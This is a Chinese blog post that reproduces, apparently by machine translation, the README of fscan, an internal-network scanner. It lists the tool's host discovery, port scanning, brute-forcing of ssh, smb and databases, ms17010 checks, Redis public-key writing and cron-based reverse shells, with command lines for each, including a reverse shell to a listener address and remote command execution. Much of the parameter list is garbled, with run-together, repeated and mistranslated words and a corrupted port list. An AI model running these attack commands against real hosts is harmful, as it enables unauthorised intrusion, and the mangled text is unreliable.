自动化运维可视化,开源的自动化测试平台

简介fscan是一款内部网综合扫描工具,一键自动化,便于全方位漏洞扫描。

主机生存检测、端口扫描、常见服务爆炸、ms17010、redis批量写入公钥、任务弹回shell规划、win网卡信息读取、web指纹识别、web漏洞扫描、netbios

源链接: https://github.com/shadow1ng/fscan

主要功能1 .信息收集:

生存检测(icmp )端口扫描2 .爆破功能:

各种服务爆破(ssh、smb等)数据库加密爆破(mysql、mssql、redis、psql等)3.系统信息、漏洞扫描:

获取目标网卡信息高危漏洞扫描(如ms17010 )4.Web探测功能:

webtitle探测器web指纹识别(常见cms、oa框架等) web漏洞扫描) weblogic、st2等支持xray的poc )5.漏洞利用:

执行redis公钥写入或计划任务ssh命令6 .其他功能:

文件保存usege的简单使用方法

fscan.exe-h192.168.1.1/24 (默认情况下使用所有模块) fscan.exe-h192.168.1.1/16节扫描) )其他用法

fscan.exe-h192.168.1.1//24-NP-no-no POC (跳过生存检查、保存文件、跳过webpoc扫描) fscan.exe-h 192.168.1.1 24-RFID 24-RS 192.168.1.133606666 (redis计划任务排斥外壳) fscan.exe-h 192.168.1.1/24-cwhoami ) ssh爆破成功后,命令() 24-mssh-p2222 (指定模块ssh和端口) fscan.exe-h 192.168.1.1/24-pwd fpwd.txt-txt -命令fscan.exe-h 192.162 可以轻松查看fscan.exe-h192.168.1.1/8(A )部分a中的192.x网络段信息(默认情况下保存到当前路径)

go build-ldflags=’-s-w ‘-trimpath完整参数

-numintPOCrate(default20 )-cstring execcommand (ssh ) ) ) ) ) ) ) ) ) ) )。 – cookiestringsetpoccookie-debugdebugmodewillprintmoreerrorinfo-domainstringsmbdomain-hstringipaddressofthehehostyouwantttttttttttttttttttttttttttttttttttttttttttd . 11|192.168.11.11-255|192.168.11, 192.168.11.11.12-hfstringhostfile as :-mssh (default ‘ all )-nonottosaveoutputlog-nopocnotoscanwebvul-nppputll :22|1-65535|22,80,3306 (default ‘ 21,22,80,81,135,443,445,1433,3306,5432,6379, 779 1081、8879、21502、9097、8088、8090、8200、91、1080、889、8834、8011、9986、9043、988、7080、1000、9089 8443、8042、7008、8161、7001、1082、8095、8087 788、1010、8092、8484、6648、9100、8009、8360、9060、85 8108、1118、8016、20720、90、8046、9443、8091、7002、8868、8010、18082、8222、7088、8082、9081、838 1000、18002、8800、884 555、7680、800、8180、9800、10002、18000、18008、98、28018、86、9092、881、8100、8012 888、7890、3128、8838、8008、8118、9080、2100、7180 9200 ‘ )-pingpingpingreplaceicmp-pocnamestringusethepocsthesecococococorp – pocnameweblogic-proxystringsetpocproxy-proxy http://127.0.0.1:8080-pwdstringpassword-pwdfstringpasswordfile 333-rsstringredisshelltowritecronfile (as :-RS 192.168.1.133606666 (-tintthreadnums (default 600 ) )-timeimeintsed setet g username-userfstringusernamefile-wtintsetwebtimeout (default5)运行截图fscan.exe

fcan.exe-h 192.168.x.x-RFID _ RSA.pub (redis写公钥) ) ) ) )。

fscan.exe-h 192.168.x.x-c ‘ whoami; id’ (ssh命令)

fscan.exe-h 192.168.x.x-p80-proxy http://127.0.0.133608080一键支持Xray POC

这个项目的开发人员参考的开源项目如下。

3359 github.com/adminisme/servers can https://github.com/netxfly/x-crack https://github.com/hack 2fun/GS can 3359 github

Published by

风君子

独自遨游何稽首 揭天掀地慰生平

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注